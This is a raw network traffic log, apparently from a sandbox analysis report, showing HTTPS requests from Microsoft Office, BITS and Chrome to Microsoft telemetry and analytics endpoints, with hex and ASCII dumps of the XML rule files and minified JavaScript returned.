                                                                                                                                                                        2024-11-24 04:12:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                        x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041200Z-178bfbc474b9fdhphC1NYCac0n00000005a000000000dr40
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        92192.168.2.74981313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                        x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041200Z-178bfbc474bfw4gbhC1NYCunf400000005cg00000000eqnd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        93192.168.2.74981413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                        x-ms-request-id: c6f64b36-301e-0000-4706-3deecc000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041200Z-178bfbc474bxkclvhC1NYC69g400000005dg000000005rhh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        94192.168.2.74981513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                        x-ms-request-id: 6dd5ded1-501e-0078-0f57-3c06cf000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041200Z-15b8b599d88hr8sfhC1TEBbca400000003w0000000003bv1
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        95192.168.2.749816184.30.17.174443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:00 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                        2024-11-24 04:12:00 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                        X-Ms-Region: prod-eus-z1
                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                        X-OSID: 2
                                                                                                                                                                        X-CID: 2
                                                                                                                                                                        X-CCC: GB
                                                                                                                                                                        Cache-Control: public, max-age=192114
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:00 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-CID: 2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        96192.168.2.74982013.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-24 04:12:02 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241124T041202Z-178bfbc474b9xljthC1NYCtw94000000058000000000hch2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:02 UTC15516INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                        2024-11-24 04:12:02 UTC16384INData Raw: 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28 31 31 29 5d 3d 22 49 50 72 6f 6d 69 73 65 22 29 2c 61 2e 74 6f
                                                                                                                                                                        Data Ascii: &&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(11)]="IPromise"),a.to
                                                                                                                                                                        2024-11-24 04:12:02 UTC16384INData Raw: 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67
                                                                                                                                                                        Data Ascii: on(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(e){Y(e,"listeners",{g
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c
                                                                                                                                                                        Data Ascii: hComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4e 6c 28 29 7b 72 65 74 75 72
                                                                                                                                                                        Data Ascii: fined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return null}function Nl(){retur
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b
                                                                                                                                                                        Data Ascii: me failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(a,e){var o=this,c={};
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                                                                                                        Data Ascii: ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageTags=function(e,t){var
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66
                                                                                                                                                                        Data Ascii: otype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70 6c 69 63 65 22 2c 44 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65
